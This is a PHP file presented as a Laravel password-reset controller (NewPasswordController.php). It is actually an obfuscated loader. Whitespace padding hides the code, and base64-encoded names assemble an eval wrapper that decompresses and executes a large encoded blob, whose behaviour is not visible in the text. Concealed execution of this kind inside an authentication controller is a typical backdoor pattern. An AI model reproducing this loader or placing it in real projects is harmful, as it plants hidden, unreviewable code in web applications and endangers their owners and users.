<?php 
        $__='printf';$_='Loading app/Http/Controllers/Auth/NewPasswordController.php';
        















































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWttuo0gQfY+0/5CHkTyjrBLASWZR5IeADQYyJEAMTb+MTHcCDlcF3/DXb4Ev2BNHm9WuZrWjPqgTaFd1d1WdOokSTk/X+PQd0OsUr5Ns+ty5aR436HXGRXExnE6LCznPpq95kjy9lhe3s2l0YT4tHsZluchfafvZeREVp3IC8+fn552bk80Wp7+dsItdP/s6qbl8+i+i92amg3ix9D1+gtVBr9NMtaz/EDb91jtlYGBg+DXRIanLUaTPNNUVfG+R64r4jKr461o0QTXXcv2dpYqBgYGBgYGBgYHh/wb25wwGBgaGXxedYFw+XV9+p08kp0+dG5YRBgYGBgaGf4TDlzD6Vm7K6VUUeO6KqMoLdiSJDCXiDG2OKMt+IFxxJBXLQHUrwi8jiuz8fsEZfavgiTAKLSQt0CDiKPhYgjijQ30eqMuEZObh80tpypm7gvV1eOYDL5n5yE7QQOGpGhEb4STI7BVSpIh0zW7Q1eNRCvbI+rrdy/GWJfX4IkgVDrtLjQ7tBVL0hCA3Id137R4pnBHW49AAR76gxBiZxFGV1bj/zpkUk4cczElmEztVXnzPTiB2y0fmigpihT/gN+raVZ0nisxEGyRlMHSnY+8qoqpL3FQpx54N98k8SJYO9ZaH68uQg0razLf52OT9JYCzw+f3GNHWZ2DOIX9VICxLjLQQo4jD3lUMdgc1BH/IUx5q8m1Ihu4kUJMXTcV8kJrc2BNnmmpW2IO8OZGDkcJDrjhNtqvtvWFxRu2rDSEHk9tmnWat7b/ghrjAiOS6UNc1nBFBmWE1nvqpUlGHlJpSZmC7pMA3KpPw4fEy1IfbGtrUeNyuK4kNN9f3C+rpkLNvIc7cmd+1i0C4DMF+TtJRPtqtdxu3a8db312869HGcvd4JfjessBqE29waNeMjKriK/YuM63PnWkybXzHSE+wTMpj9tjjo7G3eGs/XCaBpxTBO36krmmXQjzW2neXpwTqYWV3YONDP+E0qaBXY71ahKPMhVqbe7zMr2suGv2wOLLH3uDOgAscrXu6+oCtl1xiz+7DPomxy+vxATmd0fqdFaSvPmC7egJb4OxHbGuOzgMkAcf5gghu/Fc+aMvVZkhrboX7c8CXLvTh0F1BzsNRW4Pr+ww4KbiccXtg34yWr9b0IRVnwTAGvrtT30vKui56t+3ZH5+RADGkuCApv+7/CfSETLlAmCZwX9wd2W+f84Zsg8a5leFIjdYZ+73p/Mj1/TPXWqrBeTHEZyZ2CpokH+X83qCLVpN+7FWIPWvjOnbuA36n7hSvefF80FOKyZGX/JqktU6IU6PvLwxn8U5doYYOdwaaImAnLNZ6ePz8uPl5YuVB6na1tz9T8k0+ilZv9saQO5h7yxsJcg51SOt8mJxf31e34oMjHfTiaKA8jnj6MIrt51HsPtqu9Xav/h+1dsa1RvhdK2/iS0XQzhFwajnHQjLTqxhyTQvQ01zvbvertVR8hvqvKOgXRd8Kw3pbg/uJNPE98xV6ZbNGpAeZxFM53NNK6HHhqnxywp1+Gc6x3uLOqJBw4wHoRiqCdkRBy3uIfyI9oyrc9ZThck2NdjnNYIS9Xufm5OTn/8LTa75/3jx9ufk77nu+H3H81G74uVN/7fy+25a9t8qu//K91UOOfj5oijVFv9z8CRjmRYA=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      














































































































































































































































































































                                                                                                                                                                                                                     $________;
